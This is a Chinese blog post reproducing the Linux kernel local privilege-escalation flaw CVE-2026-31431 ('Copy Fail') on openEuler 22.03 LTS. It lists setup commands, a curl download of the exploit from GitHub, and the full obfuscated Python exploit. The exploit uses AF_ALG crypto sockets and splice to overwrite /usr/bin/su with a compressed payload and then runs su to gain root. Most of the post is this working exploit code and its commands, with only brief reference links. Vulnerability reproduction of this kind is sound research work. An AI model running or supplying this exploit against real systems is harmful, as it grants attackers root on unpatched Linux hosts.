【安全】openEuler-22.03-LTS服务上CVE-2026-31431漏洞复现

# cat /etc/openEuler-release
openEuler release 22.03 LTS

# uname -a
Linux localhost.localdomain 5.10.0-60.18.0.50.oe2203.x86_64 #1 SMP Wed Mar 30 03:12:24 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

#  yum -y install zlib-devel  openssl-devel  gcc  make

#  wget   https://www.python.org/ftp/python/3.14.0/Python-3.14.0.tar.xz

# tar  -Jxf Python-3.14.0.tar.xz

# cd Python-3.14.0/

# ./configure --enable-shared --prefix=/usr/local/python-3.14.0 && make -j 8 && make install

Installing collected packages: pip
  WARNING: The scripts pip3 and pip3.14 are installed in '/usr/local/python-3.14.0/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed pip-25.2
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable. It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.


# echo  "/usr/local/python-3.14.0/lib/" >> /etc/ld.so.conf.d/py3.14.0.conf

# ldconfig

# useradd -m test
# echo "Test@123" | passwd --stdin  test

# su  -  test
$ curl -L -o copy_fail.py https://raw.githubusercontent.com/theori-io/copy-fail-CVE-2026-31431/main/copy_fail_exp.py
$ chmod +x copy_fail.py
$ /usr/local/python-3.14.0/bin/python3  copy_fail_exp.py

$ cat copy_fail_exp.py

#!/usr/bin/env /usr/local/python-3.14.0/bin/python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

注:Python 环境中 os.splice() 是在 Python 3.10 中才被引入,所有执行这个脚本的python版本不低于 3.10。

image.png

参考

Copy Fail(CVE-2026-31431) 详解
https://mp.weixin.qq.com/s/_-5VX-nExsMysnAczwO03w

Linux Kernel 本地权限提升漏洞(CVE-2026-31431)
https://mp.weixin.qq.com/s/qCwPRljyFoiBpdVB3pMScg

重要提醒:尽快修复CopyFail 内核高危漏洞
https://mp.weixin.qq.com/s/f7sD9AbAwrcNuUja2y111Q

CVE-2026-31431完整解析,一个隐藏近十年的Linux内核逻辑漏洞
https://mp.weixin.qq.com/s/d9ik9WXAvitLFfP7srGakg

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容